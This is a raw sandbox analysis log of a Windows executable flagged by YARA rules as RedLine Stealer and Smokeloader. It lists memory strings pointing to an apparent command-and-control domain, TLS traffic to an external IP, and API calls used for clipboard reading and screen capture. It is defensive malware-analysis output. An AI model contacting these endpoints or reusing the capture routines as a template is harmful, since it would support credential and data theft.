            Source: 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/
            Source: 20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/$
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/8
            Source: 20qMFnd9tO.exe, 00000000.00000003.1670761878.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670659108.0000000002DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/A
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/C
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/S
            Source: 20qMFnd9tO.exe, 00000000.00000003.1670168050.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670293622.0000000002DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/a
            Source: 20qMFnd9tO.exe, 00000000.00000003.1640623370.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1639887519.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1640514270.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1639851238.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1640312122.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1640246925.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/api
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631671750.0000000000839000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/api2
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/apiH
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/apiM
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/apiy
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/apiyi
            Source: 20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/c
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/d
            Source: 20qMFnd9tO.exe, 00000000.00000003.1670714016.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670305521.0000000002D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/j
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704561901.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop:443/api
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0042AFE0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042AFE0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0042AFE0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042AFE0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0042B190 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,0_2_0042B190

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004371C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004371C0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004381B0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004381B0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004322C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,RtlAllocateHeap,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004322C0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004372F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004372F0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00415300 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00415300
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00438470 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00438470
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004344DB NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004344DB
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00437550 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00437550
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004376C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004376C0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004166A7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004166A7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004177E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004177E0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00415B15 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00415B15
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00419C00 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00419C00
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00423C16 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00423C16
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00433CF7 NtOpenSection,0_2_00433CF7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00416C80 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00416C80
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00434D0A NtMapViewOfSection,0_2_00434D0A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00436E10 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00436E10
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00419E30 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00419E30
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0041EFD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_0041EFD0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00436FF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00436FF0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004180C5 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004180C5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00413145 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00413145
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00430450 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00430450
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00437420 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00437420
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00417670 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00417670
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00432600 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00432600
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004136F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004136F0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0041B6AF NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_0041B6AF
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004328F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004328F0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00421890 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00421890
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004379E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_004379E0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00432A50 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00432A50
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0041BA3C NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_0041BA3C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0041DA90 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_0041DA90
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00432B60 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00432B60
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00418B31 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00418B31
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0041DBF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_0041DBF0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00432C90 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00432C90
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00437D70 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00437D70
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00432DA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00432DA0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00416E36 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00416E36
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00423FF3 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00423FF3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717077 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717077
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00713007 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00713007
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F709D NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F709D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FA097 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FA097
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717257 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717257
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0070425A NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_0070425A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FF237 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FF237
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F832C NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F832C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F33AC NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F33AC
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717427 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717427
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00718417 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00718417
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F5567 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F5567
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717557 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717557
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00712527 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00712527
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FA62C NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FA62C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007186D7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_007186D7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007106B7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_007106B7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717687 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717687
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00714742 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00714742
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007177B7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_007177B7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00712867 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00712867
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F78D7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F78D7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F3957 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F3957
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717927 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717927
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F690E NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F690E
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FB916 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FB916
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FA981 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FA981
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F7A47 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F7A47
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00701AF7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00701AF7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00712B57 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00712B57
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717C47 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717C47
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FDCEB NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FDCEB
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00712CB7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00712CB7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FBCA3 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FBCA3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F5D7C NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F5D7C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FED2E NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FED2E
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00712DC7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00712DC7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F8D98 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F8D98
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F9E67 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F9E67
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00703E7D NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00703E7D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FDE4E NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FDE4E
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FEE57 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006FEE57
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00712EF7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00712EF7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F6EF4 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_006F6EF4
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717FD7 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_00717FD7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00404AB00_2_00404AB0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0041EFD00_2_0041EFD0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0042404C0_2_0042404C
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004040E00_2_004040E0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004301F00_2_004301F0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004051B00_2_004051B0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004033500_2_00403350
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0040A3000_2_0040A300
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004114100_2_00411410
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004064F00_2_004064F0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004037400_2_00403740
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004057000_2_00405700
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_004379E00_2_004379E0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00406BF00_2_00406BF0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00420BFA0_2_00420BFA
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00437D700_2_00437D70
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00423F4D0_2_00423F4D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00407FE00_2_00407FE0
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00423FF30_2_00423FF3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007041B40_2_007041B4
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E82470_2_006E8247
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0070425A0_2_0070425A
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006FF2370_2_006FF237
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007042B30_2_007042B3
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E43470_2_006E4347
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007104570_2_00710457
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E54170_2_006E5417
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006EA5670_2_006EA567
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E35B70_2_006E35B7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006F16770_2_006F1677
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E67570_2_006E6757
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E39A70_2_006E39A7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717C470_2_00717C47
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E4D170_2_006E4D17
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00700E610_2_00700E61
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00717FD70_2_00717FD7
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: String function: 00409160 appears 162 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: String function: 00408A40 appears 41 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: String function: 006E8CA7 appears 42 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: String function: 006E93C7 appears 162 times
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: webio.dllJump to behavior
